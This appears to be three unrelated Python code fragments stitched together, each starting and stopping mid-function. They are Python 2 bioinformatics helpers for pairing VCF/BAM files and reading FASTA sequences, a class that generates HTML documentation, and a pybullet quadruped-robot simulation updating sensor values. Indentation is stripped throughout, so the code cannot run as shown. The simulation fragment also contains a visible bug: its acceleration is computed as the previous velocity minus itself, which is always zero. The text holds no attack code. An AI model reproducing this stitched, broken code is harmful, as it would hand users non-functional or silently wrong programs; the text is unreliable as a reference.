else:
print "Error:Wrong Identifier input"
sys.exit()
for infile in infiles_combine:
infile_name_list=infile.split(file_name_sep_char)
for index in range(unique_ID_length):
if index == 0:
infile_id=infile_name_list[index]
else:
infile_id=infile_id+file_name_sep_char+infile_name_list[index]
#print "identifier2, infile and find result: ", identifier2, infile, infile.find(identifier2)
if infile.find(identifier)>0:
paired_dict[infile_id][1]=infile
else:
paired_dict[infile_id][0]=infile
for id_item in id_list:
infiles.append((paired_dict[id_item][0],paired_dict[id_item][1]))
print "Pair1 and Pair 2 is", paired_dict[id_item][0], paired_dict[id_item][1]
return infiles
def generate_paired_files_by_ID(infiles_combine,unique_ID_length,vcf_suffix="vcf",bam_suffix="bam",sep_char="_",UNPAIRED_STOP=False):
## this script will pair input files based on equal unique_ID_length
## Version update, provide flexible pairing for the 2 file case
paired_list=list()
if len(infiles_combine)==2:
##quick function
vcf_infile=""
bam_infile=""
for infile in infiles_combine:
if infile.endswith(vcf_suffix):
vcf_infile=infile
elif infile.endswith(bam_suffix):
bam_infile=infile
else:
print "[ERROR] unsupported file suffix"
print "Please check your input file"
sys.exit(0)
if vcf_infile!="" and bam_infile!="":
result_list=[vcf_infile,bam_infile]
paired_list.append(result_list)
return paired_list
else:
print "[ERROR] not enough input, input files are missing"
print "Please check your input file"
sys.exit(0)
else:
data_dict=dict()
for infile in infiles_combine:
if infile.count("/")>0:
infile_temp=infile.split("/")
infile_info=infile_temp[-1]
else:
infile_info=infile
infile_list=infile_info.split(sep_char)
for i in range(unique_ID_length):
if i==0:
unique_ID=infile_list[i]
else:
unique_ID=unique_ID+"_"+infile_list[i]
data_dict[unique_ID]=[]
for infile in infiles_combine:
if infile.count("/")>0:
infile_temp=infile.split("/")
infile_info=infile_temp[-1]
else:
infile_info=infile
infile_list=infile_info.split(sep_char)
for i in range(unique_ID_length):
if i==0:
unique_ID=infile_list[i]
else:
unique_ID=unique_ID+"_"+infile_list[i]
data_dict[unique_ID].append(infile)
data_list=data_dict.keys()
for data_pair in data_list:
if len(data_dict[data_pair])!=2:
if UNPAIRED_STOP:
print "incorrect data_pair id is", data_pair
print "Incorrect pairing, Please check your input"
sys.exit(0)
else:
data1,data2=data_dict[data_pair]
if data1.count(bam_suffix)>=1 and data2.endswith(vcf_suffix):
ordered_list=[data2,data1]
elif data1.endswith(vcf_suffix) and data2.count(bam_suffix)>=1:
ordered_list=[data1,data2]
else:
print "incorrect pairing, Please check your input"
sys.exit(0)
paired_list.append(ordered_list)
## first item is the vcf file and second is bam file
return paired_list
def set_database_path():
##version1.0
##Home Lenovo Destop
try:
Lib_PATH="E:\Dropbox\protocol\database\human_genome"
sys.path.append(Lib_PATH)
except:
pass
def output_row_sup_list(handle,row,sup_list,sep_char='\t'):
len_row=len(row)
if len(sup_list)>0:
for i in range(len_row):
handle.write(row[i]+'\t')
else:
for i in range(len_row-1):
handle.write(row[i]+'\t')
handle.write(row[i+1]+'\n')
len_list=len(sup_list)
for i in range(len_list):
if i==(len_list-1):
handle.write(str(sup_list[i])+'\n')
else:
handle.write(str(sup_list[i])+sep_char)
def Compile_population_to_one(infiles,GENE_COLUMN):
##SECTION I: OUTPUT SETUP
##output data name
output_name="compiled_data.txt"
##generate the general file object
outfile_obj=GeneralFile_class(output_name)
##Set up file handle and write header
outfile_obj.output_handle_gen(infiles[0],os.getcwd(),["SAMPLE_ID"])
outfile_handle=outfile_obj.handle
##SECTION II:PROCESS OUTPUT
for infile in infiles:
##Report Progress
print "Start to process infile,",infile
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
##generate the sample ID
sample_ID=infile_obj.sampleID_gen()
for rows in infile_reader:
if rows[GENE_COLUMN]!='.':
output_row_sup_list(outfile_handle,rows,[sample_ID])
##Report Progress
print "Finish processing infile,",infile
outfile_handle.close()
def Compile_genelist_to_one(infiles,GENE_COLUMN):
##INITILIZE
sample_number=len(infiles)
##SECTION I: OUTPUT SETUP FOR GENE LIST
##output data name
output_name="compiled_genelist.txt"
##generate the general file object
outfile_obj=GeneralFile_class(output_name)
##Set up file handle and write header
outfile_obj.output_handle_gen()
outfile_handle=outfile_obj.handle
outfile_handle.write("GENE"+'\t'+"SAMPLE(S)"+'\n')
##SECTION I: OUTPUT SETUP FOR GENE FREQUENCT AMONG POPULATION STATISTICS
##output data name
output_stat_name="gene_freq_stat.txt"
##generate the general file object
outfile_stat_obj=GeneralFile_class(output_stat_name)
##Set up file handle and write header
outfile_stat_obj.output_handle_gen()
outfile_stat_handle=outfile_stat_obj.handle
outfile_stat_handle.write("Count_Type"+'\t')
outfile_stat_handle.write("1")
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(i+1))
outfile_stat_handle.write("\n")
##SECTION I: OUTPUT SETUP FOR GENE COUNT PER SAMPLE
##output data name
count_stat_name="gene_count_stat.txt"
##generate the general file object
outfile_count_obj=GeneralFile_class(count_stat_name)
##Set up file handle and write header
outfile_count_obj.output_handle_gen()
outfile_count_handle=outfile_count_obj.handle
outfile_count_handle.write("SAMPLE_ID"+'\t'+"GENE_COUNT"+'\n')
##SECTION II:PROCESS OUTPUT INITIALIZE THE DICTIONARY
genelist_dict=dict()
for infile in infiles:
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
for rows in infile_reader:
gene=rows[GENE_COLUMN]
if gene=='.':
pass
else:
genelist_dict[gene]=[]
##SECTION III:PROCESS DATA INTO DICTIONARY
for infile in infiles:
sample_gene_count=0
##generate the general file object
infile_obj=GeneralFile_class(infile)
##generate the reader for input file
infile_reader=infile_obj.reader_gen()
##generate the sample ID
sample_ID=infile_obj.sampleID_gen()
for rows in infile_reader:
gene=rows[GENE_COLUMN]
if gene=='.':
pass
else:
genelist_dict[gene].append(sample_ID)
sample_gene_count+=1
outfile_count_handle.write(sample_ID+'\t'+str(sample_gene_count)+'\n')
outfile_count_handle.close()
##SECTION III:OUTPUT DATA INTO FILES
sample_freq_list=[0]*sample_number
genelist=genelist_dict.keys()
gene_number=len(genelist)
for gene in genelist:
samples=genelist_dict[gene]
samples_output=""
samples_number_per_gene=len(samples)
#print samples_number_per_gene
sample_freq_list[samples_number_per_gene-1]+=1
for sample in samples:
samples_output=samples_output+sample+';'
outfile_handle.write(gene+'\t'+samples_output+'\n')
##SECTION IV:OUTPUT GENE FREQUENCY AMONG POPULATION STATISTICS
outfile_stat_handle.write("Count"+'\t')
outfile_stat_handle.write(str(sample_freq_list[0]))
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(sample_freq_list[i]))
outfile_stat_handle.write("\n")
##Output Percentage
outfile_stat_handle.write("Percentage"+'\t')
outfile_stat_handle.write(str(round(float(sample_freq_list[0])*100.00/gene_number,2)))
for i in range(1,sample_number):
outfile_stat_handle.write('\t'+str(round(float(sample_freq_list[i])*100.00/gene_number,2)))
outfile_stat_handle.write("\n")
outfile_handle.close()
def reverse_complementary(base_pairs):
convert_dict=dict()
convert_dict["A"]="T"
convert_dict["T"]="A"
convert_dict["C"]="G"
convert_dict["G"]="C"
convert_dict["I"]="I"
convert_dict["D"]="D"
convert_dict["N"]="N"
new_base_pairs=""
reverse_complement_sequence=""
for nt in base_pairs:
new_base_pairs+=convert_dict[nt]
seq_length=len(base_pairs)
for i in range(seq_length-1,-1,-1):
reverse_complement_sequence+=new_base_pairs[i]
return reverse_complement_sequence
def freq_y_axis_gen(data_list,x_list):
##version 0.1 the value must match exactly
y_list=[]
total_count=len(data_list)
for x in x_list:
y=data_list.count(x)
y_percentage=round((100.00 * y / total_count),1)
y_list.append(y_percentage)
return y_list
def freq_y_axis_gen_v2(data_list,x_list):
##version 2, this will output the raw data as well
y_list=[]
y_raw_list=[]
total_count=len(data_list)
for x in x_list:
y=data_list.count(x)
y_raw_list.append(y)
y_percentage=round((100.00 * y / total_count),1)
y_list.append(y_percentage)
return y_list,y_raw_list
def generate_unique_id_from_snv(data_list):
chro=data_list[0]
coor=data_list[1]
ref=data_list[3]
alt=data_list[4]
combined_id=chro+"_"+coor+"_"+ref+"_"+alt
return combined_id
def read_fasta_degenerate(fasta_file,detect_Blank_line_mode=True,removeN=True,simple_ID=False,convert_degenerate=True):
"""
this function read fasta files and be able to convert the
degenerated sequences to certain
"""
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
final_seq = ""
for index in range(len(current_seq)):
nt = current_seq[index]
if convert_degenerate:
replace_nt = nt_degenerate_dict[nt][0]
final_seq=final_seq+replace_nt
else:
final_seq=final_seq+nt
fasta_seq=fasta_seq+final_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
final_seq = ""
for index in range(len(current_seq)):
nt = current_seq[index]
if convert_degenerate:
replace_nt = nt_degenerate_dict[nt][0]
final_seq=final_seq+replace_nt
else:
final_seq=final_seq+nt
if len(current_seq)!=0:
fasta_seq=fasta_seq+final_seq
except:
fasta_seq="NA"
if Blank_line_mode:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
return fasta_dict
def read_fasta(fasta_file,detect_Blank_line_mode=True,removeN=True,simple_ID=False):
'''
version:1.0
this function have additional option to change sequence IDs
'''
## Commonly used function
## Now can handle two types of fasta files
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
fasta_seq=fasta_seq+current_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
fasta_ID=row[0][1:]
if simple_ID==True:
tmp_list = fasta_ID.split(" ")
fasta_ID = tmp_list[0]
fasta_seq=""
else:
current_seq=row[0].upper()
if len(current_seq)!=0:
fasta_seq=fasta_seq+current_seq
except:
fasta_seq="NA"
if Blank_line_mode:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
return fasta_dict
def read_fasta_original(fasta_file,detect_Blank_line_mode=True,removeN=True):
'''
version 0.8
'''
## Commonly used function
## Now can handle two types of fasta files
fasta_dict=dict()
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
Blank_line_mode=False
if detect_Blank_line_mode==True:
blank_line_count=0
for row in infile_reader:
if len(row)==0:
blank_line_count+=1
if blank_line_count>1:
Blank_line_mode=True
print Blank_line_mode
infile_obj=GeneralFile_class(fasta_file)
infile_obj.SKIP_HEADER=0
infile_reader=infile_obj.reader_gen()
line_count=0
for row in infile_reader:
line_count+=1
if Blank_line_mode:
if len(row)==0:
if removeN==True and fasta_seq.count("N")>0:
pass
else:
fasta_dict[fasta_ID]=fasta_seq
else:
if row[0][0]==">":
fasta_ID=row[0][1:]
fasta_seq=""
else:
current_seq=row[0]
fasta_seq=fasta_seq+current_seq
else:
try:
if row[0][0]==">":
if line_count!=1 and fasta_seq!="NA":
if removeN==True and fasta_seq.count("N")>0:
pass
else:
| |
Generator:
"""class which handles docs generation."""
def __init__(self) -> None:
self._index_keys: list[str] = []
# Make a list of missing stuff so we can warn about it in one
# big chunk at the end (so the user can batch their corrections).
self._errors: list[Any] = []
self._index: dict[str, tuple[str, Union[ClassInfo, FunctionInfo,
AttributeInfo]]] = {}
self._out = ''
self._classes: list[ClassInfo] = []
self._functions: list[FunctionInfo] = []
self._merged_categories: list[tuple[str, str,
list[Union[ClassInfo,
FunctionInfo]]]] = []
def name_variants(self, name: str) -> list[str]:
"""Return variants of a word (such as plural) for linking."""
# Do 'ies' plural for words ending in y.
# (but not things like foo.y or display or prey)
if (len(name) > 1 and name.endswith('y') and name[-2].isalpha()
and name[-2] not in {'a', 'e', 'i', 'o', 'u'}):
return [name, f'{name[:-1]}ies']
# Otherwise assume plural just ends with s:
return [name, f'{name}s']
def _add_index_links(self,
docs: str,
ignore_links: Optional[list[str]] = None) -> str:
"""Add links to indexed classes/methods/etc found in a docstr."""
sub_num = 0
subs = {}
# Ok now replace any names found in our index with links.
for index_entry in self._index_keys:
if ignore_links is not None and index_entry in ignore_links:
continue
for index_entry_actual in self.name_variants(index_entry):
bits = docs.split(index_entry_actual)
docs = bits[0]
# Look at the first char after each split; if its
# not alphanumeric, lets replace.
for i in range(1, len(bits)):
bit = bits[i]
if not bit:
valid = True
else:
valid = not bit[:1].isalnum()
if valid:
# Strip out this name and replace it with a funky
# string to prevent further replacements from
# applying to it.. we'll then swap it back at the end.
sub_name = '<__SUB' + str(sub_num) + '__>'
subs[sub_name] = index_entry_actual
sub_num += 1
# Sub in link.
docs += ('<a href="#' + self._index[index_entry][0] +
'">' + sub_name + '</a>')
else:
docs += index_entry_actual # Keep original.
docs += bits[i]
# Misc replacements:
docs = docs.replace(
'General message handling; can be passed any message object.',
'General message handling; can be passed any <a href="#' +
_get_class_category_href('Message Classes') +
'">message object</a>.')
for sub_name, sub_val in list(subs.items()):
docs = docs.replace(sub_name, sub_val)
return docs
def _get_all_attrs_for_class(self, cls: type,
docs: str) -> tuple[str, list[AttributeInfo]]:
"""
if there's an 'Attributes' section in the docs, strip it out and
create attributes entries out of it.
Returns the stripped down docs as well as detected attrs.
"""
attrs: list[AttributeInfo] = []
# Start by pulling any type info we find in the doc str.
# (necessary in many non-property cases since there's no other way
# to annotate attrs)
docs = parse_docs_attrs(attrs, docs)
# In some cases we document an attr in the class doc-string but
# provide an annotation for it at the type level.
# (this is the case for simple class/instance attributes since we
# can't provide docstrings along with those)
self._get_class_level_types_for_doc_attrs(cls, attrs)
# Now pull info on properties, which can have doc-strings and
# annotations all in the same place; yay!
self._get_property_attrs_for_class(cls, attrs)
return docs, attrs
def _get_class_level_types_for_doc_attrs(
self, cls: type, attrs: list[AttributeInfo]) -> None:
# Take note of all the attrs that we're aware of already;
# these are the ones we can potentially provide type info for.
existing_attrs_by_name = {a.name: a for a in attrs}
cls_annotations = getattr(cls, '__annotations__', {})
for aname, aval in cls_annotations.items():
# (we expect __future__ annotations to always be on, which makes
# these strings)
assert isinstance(aval, str)
if aname in existing_attrs_by_name:
# Complain if there's a type in both the docs and the type.
if existing_attrs_by_name[aname].attr_type is not None:
print('FOUND', existing_attrs_by_name[aname], aval)
self._errors.append(
f'attr {aname} for class {cls}'
'has both a docstring and class level annotation;'
' should just have one')
existing_attrs_by_name[aname].attr_type = aval
def _get_property_attrs_for_class(self, cls: type,
attrs: list[AttributeInfo]) -> None:
for attrname in dir(cls):
attr = getattr(cls, attrname)
if isinstance(attr, property):
if any(a.name == attrname for a in attrs):
raise Exception(f'attr "{attrname}" has both a'
f' class docs and property entry')
# Pull its docs.
attrdocs = getattr(attr, '__doc__', None)
if attrdocs is None:
self._errors.append(
f'property \'{attrname}\' on class {cls}')
attrdocs = '(no docs)'
else:
attrdocs = attrdocs.strip()
# Pull type annotations.
attr_annotations = getattr(attr.fget, '__annotations__')
if (not isinstance(attr_annotations, dict)
or 'return' not in attr_annotations
or not isinstance(attr_annotations['return'], str)):
raise Exception('property type annotation not found')
attrtype = attr_annotations['return']
if '(internal)' not in attrdocs:
attrs.append(
AttributeInfo(name=attrname,
docs=attrdocs,
attr_type=attrtype))
def _get_base_docs_for_class(self, cls: type) -> str:
if cls.__doc__ is not None:
docs = cls.__doc__
docs_lines = docs.splitlines()
min_indent = 9999
for i, line in enumerate(docs_lines):
if line != '':
spaces = 0
while line and line[0] == ' ':
line = line[1:]
spaces += 1
if spaces < min_indent:
min_indent = spaces
if min_indent == 9999:
min_indent = 0
for i, line in enumerate(docs_lines):
if line != '':
if not line.startswith(' ' * min_indent):
raise Exception("expected opening whitespace: '" +
line + "'; class " + str(cls))
docs_lines[i] = line[min_indent:]
docs = '\n'.join(docs_lines)
else:
docs = '(no docs)'
self._errors.append(f'base docs for class {cls}')
return docs
def _get_enum_values_for_class(self, cls: type) -> Optional[list[str]]:
if issubclass(cls, Enum):
return [val.name for val in cls]
return None
def _get_methods_for_class(
self, cls: type) -> tuple[list[FunctionInfo], list[FunctionInfo]]:
import types
method_types = [
types.MethodDescriptorType, types.FunctionType, types.MethodType
]
methods_raw = [
getattr(cls, name) for name in dir(cls)
if any(isinstance(getattr(cls, name), t)
for t in method_types) and (
not name.startswith('_') or name == '__init__')
and '_no_init' not in name
]
methods: list[FunctionInfo] = []
inherited_methods: list[FunctionInfo] = []
for mth in methods_raw:
# Protocols seem to give this...
if mth.__name__ == '_no_init':
continue
# Keep a list of inherited methods but don't do a full
# listing of them.
if _is_inherited(cls, mth.__name__):
dcls = _get_defining_class(cls, mth.__name__)
assert dcls is not None
inherited_methods.append(
FunctionInfo(name=mth.__name__,
method_class=dcls.__module__ + '.' +
dcls.__name__))
continue
# Use pydoc stuff for python methods since it includes args.
# Its a c-defined method.
if isinstance(mth, types.MethodDescriptorType):
if mth.__doc__ is not None:
mdocs = mth.__doc__
else:
mdocs = '(no docs)'
self._errors.append(mth)
is_class_method = False
# Its a python method.
else:
mdocs, is_class_method = self._python_method_docs(cls, mth)
if '(internal)' not in mdocs:
methods.append(
FunctionInfo(name=mth.__name__,
docs=mdocs,
is_class_method=is_class_method))
return methods, inherited_methods
def _python_method_docs(self, cls: type,
mth: Callable) -> tuple[str, bool]:
import pydoc
mdocs_lines = pydoc.plain(pydoc.render_doc(mth)).splitlines()[2:]
# Remove ugly 'method of builtins.type instance'
# on classmethods.
mdocs_lines = [
l.replace('method of builtins.type instance', '')
for l in mdocs_lines
]
# Pydoc indents all lines but the first 4 spaces;
# undo that.
for i, line in enumerate(mdocs_lines):
if i != 0:
if not line.startswith(' '):
raise Exception('UNEXPECTED')
mdocs_lines[i] = line[4:]
# Class-methods will show up as bound methods when we pull
# them out of the type (with the type as the object).
# Regular methods just show up as normal functions in
# python 3 (no more unbound methods).
is_class_method = inspect.ismethod(mth)
# If this only gave us 1 line, it means there's no docs
# (the one line is just the call signature).
# In that case lets try parent classes to see if they
# have docs.
if len(mdocs_lines) == 1:
mdocs_lines = self._handle_single_line_method_docs(
cls, mdocs_lines, mth)
# Add an empty line after the first.
mdocs_lines = [mdocs_lines[0]] + [''] + mdocs_lines[1:]
if len(mdocs_lines) == 2:
# Special case: we allow dataclass types to have no __init__ docs
# since they generate their own init (and their attributes tell
# pretty much the whole story about them anyway).
if (hasattr(cls, '__dataclass_fields__')
and mth.__name__ == '__init__'):
pass
else:
self._errors.append((cls, mth))
mdocs = '\n'.join(mdocs_lines)
return mdocs, is_class_method
def _handle_single_line_method_docs(self, cls: type,
mdocs_lines: list[str],
mth: Callable) -> list[str]:
import pydoc
for testclass in cls.mro()[1:]:
testm = getattr(testclass, mth.__name__, None)
if testm is not None:
mdocs_lines_test = pydoc.plain(
pydoc.render_doc(testm)).splitlines()[2:]
# Split before "unbound method" or "method".
if 'unbound' in mdocs_lines_test[0]:
if len(mdocs_lines_test[0].split('unbound')) > 2:
raise Exception('multi-unbounds')
mdocs_lines_test[0] = \
mdocs_lines_test[0].split('unbound')[0]
else:
if len(mdocs_lines_test[0].split('method')) > 2:
raise Exception('multi-methods')
| |
joint_target_positions,
)
except Exception as e:
print(f'\033[1;93m[w]\033[0m {e}.')
# =========================== UPDATE FUNCTIONS =========================== #
@staticmethod
def __contact_info_average(
contact_points_info: List[ContactInfo]
) -> Tuple[float, float, np.array]:
"""
Given a robot toe position and orientation, returns the positions of
the toe height sensor coordinates.
Arguments:
----------
contact_points_info: List[ContactInfo]
List containing the contact info of each point that has
contact with the leg foot.
Returns:
--------
float
magnitude of the normmal force on the foot.
float
Friction coeficient between the foot and the terrain.
numpy.array, shape (3,)
direction of the normal force accting on the foot.
"""
contact_force = np.array([0,0,0])
friction_force = np.array([0,0,0])
for contact_info in contact_points_info:
contact_force = contact_force + contact_info.normalForce *\
np.array(contact_info.contactNormalOnB)
friction_1 = contact_info.lateralFriction1 * \
np.array(contact_info.lateralFrictionDir1)
friction_2 = contact_info.lateralFriction2 * \
np.array(contact_info.lateralFrictionDir2)
friction_force = friction_force + friction_1 + friction_2
contact_force_mag = np.sqrt(contact_force.dot(contact_force))
fricction_coefficient = np.sqrt(friction_force.dot(friction_force))
if contact_force_mag != 0:
fricction_coefficient /= contact_force_mag
contact_force /= contact_force_mag
else:
contact_force = np.array([0,0,0])
friction_force = np.array([0,0,0])
return (contact_force_mag, fricction_coefficient, contact_force)
def __add_noise(self, data: np.array, std: float) -> np.array:
"""
Add noise to data obtained from a sensor.
"""
return data + np.random.normal(0, std, data.shape)
def step(self):
"""
Next frame in the simulation.
"""
if self.real_step:
self.dt = time() - self.timestep - self.initial_time
self.timestep += self.dt
else:
for _ in range(CONTROLLER_LATENCY_STEPS-1):
self.p.stepSimulation()
self.update_acceleration()
self.p.stepSimulation()
self.timestep += self.dt*CONTROLLER_LATENCY_STEPS
def update_position_orientation(self):
"""
[TODO]
"""
for quadruped in self.quadrupeds:
quadruped.position, quadruped.orientation = \
self.p.getBasePositionAndOrientation(quadruped.id)
quadruped.orientation = \
self.p.getEulerFromQuaternion(quadruped.orientation)
quadruped.orientation = self.__add_noise(
np.array(quadruped.orientation),
ORIENTATION_NOISE
)
def update_acceleration(self):
"""
Update the acceleration of the quadruped, by differentiating the
velocity (expressed in the worldframe).
"""
for quadruped in self.quadrupeds:
quadruped.wf_linear_vel_prev = quadruped.wf_linear_vel
quadruped.wf_linear_vel, quadruped.wf_angular_vel = np.array(
self.p.getBaseVelocity(quadruped.id)
)
self.linear_acc = self.__add_noise(
(quadruped.wf_linear_vel_prev - quadruped.wf_linear_vel_prev) / SIM_SECONDS_PER_STEP,
ACCELERATION_NOISE
)
def update_base_velocity(self):
"""
Updates the body linear and angular velocity for the current
simulation step.
Applies a transformation matrix to the body linear and angular
velocities.
Note: Must be called after updating the acceleration, and the
orientation of the quadruped.
"""
for quadruped in self.quadrupeds:
quadruped.linear_vel = self.__add_noise(
quadruped.rot_matrix @ quadruped.wf_linear_vel,
VELOCITY_NOISE * self.dt
)
quadruped.angular_vel = self.__add_noise(
quadruped.rot_matrix @ quadruped.wf_angular_vel,
ANGULAR_VEL_NOISE
)
def update_joints_sensors(self):
"""
Update position, velocity and torque for each joint for the current
simulation step.
"""
for quadruped in self.quadrupeds:
joint_states = self.p.getJointStates(
bodyUniqueId = quadruped.id,
jointIndices = JOINTS_IDS
)
for i, j_state in enumerate(joint_states):
j_state = JointState(*j_state)
quadruped.joint_angles[i] = self.__add_noise(
np.array(j_state.jointPosition),
JOINT_ANGLE_NOISE
)
quadruped.joint_velocities[i] = self.__add_noise(
np.array(j_state.jointVelocity),
JOINT_VELOCITY_NOISE / (self.dt + EPSILON)
)
quadruped.joint_torques[i] = j_state.appliedJointMotorTorque
def update_toes_contact_info(self):
"""
Updates the contact info for each toe for the current simulation
steps. The contact info include:
* normal_toe
* toes_force1
* ground_friction
* toes_contact
"""
for quadruped in self.quadrupeds:
for i, toe_id in enumerate(TOES_IDS):
toe_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = toe_id
)
if toe_contact_info == ():
quadruped.normal_toe[i] = (0,0,0)
quadruped.toes_force1[i] = 0
quadruped.ground_friction[i] = 0
quadruped.toes_contact[i] = 0
else:
contact_force, fricction_coefficient, normal = \
self.__contact_info_average(
[ContactInfo(*elem) for elem in (toe_contact_info)]
)
quadruped.normal_toe[i] = normal
quadruped.toes_force1[i] = contact_force
quadruped.ground_friction[i] = fricction_coefficient
quadruped.toes_contact[i] = 1
def update_thighs_contact_info(self):
"""
Updates the contact info for each thigh for the current simulation step.
"""
for quadruped in self.quadrupeds:
for i, thigh_id in enumerate(THIGHS_IDS):
thigh_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = thigh_id
)
quadruped.thighs_contact[i] = int(thigh_contact_info != ())
def update_shanks_contact_info(self):
"""
Updates the contact info for each shank for the current simulation step.
"""
for quadruped in self.quadrupeds:
for i, shank_id in enumerate(SHANKS_IDS):
shank_contact_info = self.p.getContactPoints(
bodyA = quadruped.id,
bodyB = self.terrain,
linkIndexA = shank_id
)
quadruped.shanks_contact[i] = int(shank_contact_info != ())
def update_height_scan(self, debug = False):
"""
Update the height scan for each step for the current simulation step.
"""
for quadruped in self.quadrupeds:
link_states = self.p.getLinkStates(quadruped.id, TOES_IDS)
for i, toe_link_state in enumerate(link_states):
toe_link_state = LinkState(*toe_link_state)
toe_orientation = toe_link_state.linkWorldOrientation
toe_position = toe_link_state.linkWorldPosition
# Height scan around each foot
_, _, yaw = self.p.getEulerFromQuaternion(toe_orientation)
x,y,z = toe_position
P = self.__foot_scan_coordinates(x,y,yaw)
z_terrain = [self.__terrain_height(x_p,y_p) for (x_p,y_p) in P]
if debug:
quadruped.height_scan_lines[i] = np.array([
[[x, y, z], [x_p, y_p, z_t]] for (x_p, y_p), z_t in \
zip(P, z_terrain)]
)
quadruped.height_scan[i] = [z_t - z for z_t in z_terrain]
def update_toes_force(self):
"""
Update force in each step for the current simulation step.
"""
for quadruped in self.quadrupeds:
toe_force_sensor_threshold = 6 # Newtons
join_states = self.p.getJointStates(
bodyUniqueId = quadruped.id,
jointIndices = TOES_IDS
)
for i, toe_joint_state in enumerate(join_states):
toe_joint_state = JointState(*toe_joint_state)
# "Analog" toe force sensor
F_x, F_y, F_z, _, _, _ = toe_joint_state.jointReactionForces
F = float(abs(F_x) + abs(F_y) + abs(F_z))
quadruped.toes_force2[i] = F > toe_force_sensor_threshold
def update_external_force(self):
"""
Update the external force to the base
"""
if self.timestep < EXTERNAL_FORCE_TIME:
self.__apply_force(self.external_force)
elif not self.external_force_applied:
self.external_force = [0, 0, 0]
self.external_force_applied = True
self.__apply_force(self.external_force)
def update_transf_matrices(self):
"""
Update the transformation matrices from the hip to the leg base.
"""
for quadruped in self.quadrupeds:
quadruped.transf_matrices = transformation_matrices(quadruped.orientation)
def update_rotation_matrix(self):
"""
"""
for quadruped in self.quadrupeds:
quadruped.rot_matrix = np.array(self.p.getMatrixFromQuaternion(
self.p.getQuaternionFromEuler(quadruped.orientation)
)).reshape(3,3)
def update_is_fallen(self):
"""
Update the state that indicates whether the quadruped has fallen.
If the up directions between the base and the world is larger (the dot
product is smaller than 0.55), spot is considered fallen.
There was a second condition in the original code, but it was not
implemented as it caused early termination of the simulation.
The condition was the following: The base is very low on the ground
(the height is smaller than 0.13 meter).
Reference:
----------
Minitaur enviroment (an original pybullet RL enviroment)
"""
for quadruped in self.quadrupeds:
quadruped.is_fallen = quadruped.rot_matrix[2,2] < 0.55
def update_gravity_vector(self):
"""
Updates the gravity vector.
"""
for quadruped in self.quadrupeds:
quadruped.gravity_vector = GRAVITY_VECTOR @ quadruped.rot_matrix
def update_sensor_output(self, debug = False):
"""
Updates the sensor states for the current simulation steps.
It updates the following robot parameters
Historic Data:
* joint_position_error_history
Base Velocity:
* base_linear_velocity
* base_angular_velocity
Contact info:
* normal_toe
* toes_force1
* ground_friction
* toes_contact
* thighs_contact
* shanks_contact
Height Scan:
* height_scan
Toe Force Sensors:
* toe_force_sensor
Actuated joints sensors:
* joint_angles
* joint_velocities
* joint_torques
"""
self.update_position_orientation()
self.update_rotation_matrix()
self.update_acceleration()
self.update_base_velocity()
self.update_joints_sensors()
self.update_toes_contact_info()
self.update_thighs_contact_info()
self.update_shanks_contact_info()
self.update_height_scan(debug = debug)
self.update_toes_force()
self.update_external_force()
self.update_transf_matrices()
self.update_is_fallen()
self.update_gravity_vector()
# ========================= TESTING FUNCTIONS ========================= #
def create_vector(
self,
r_o: np.array,
r_f: np.array,
length: int=1,
r: int=0,
g: int=0,
b: int=1
) -> int:
"""
Create a vector between two points in world coordinates.
Arguments:
----------
r_o: numpy.array, shape (3,)
Origin of the vector
r_f: numpy.array, shape (3,)
Final point of the vector
r: float, optional
Red color component.
Default: 0
g: float, optional
Green color component.
Default: 0
b: float, optional
Blue color component.
Default: 1
Return:
-------
Vector id.
"""
# We get the vector direction
vector = r_f - r_o
# We get the vector length
vector_length = np.linalg.norm(vector)
if vector_length == 0: return -1
# We normalize the vector
vector = vector / vector_length
# We get the pitch and yaw angles from the vector
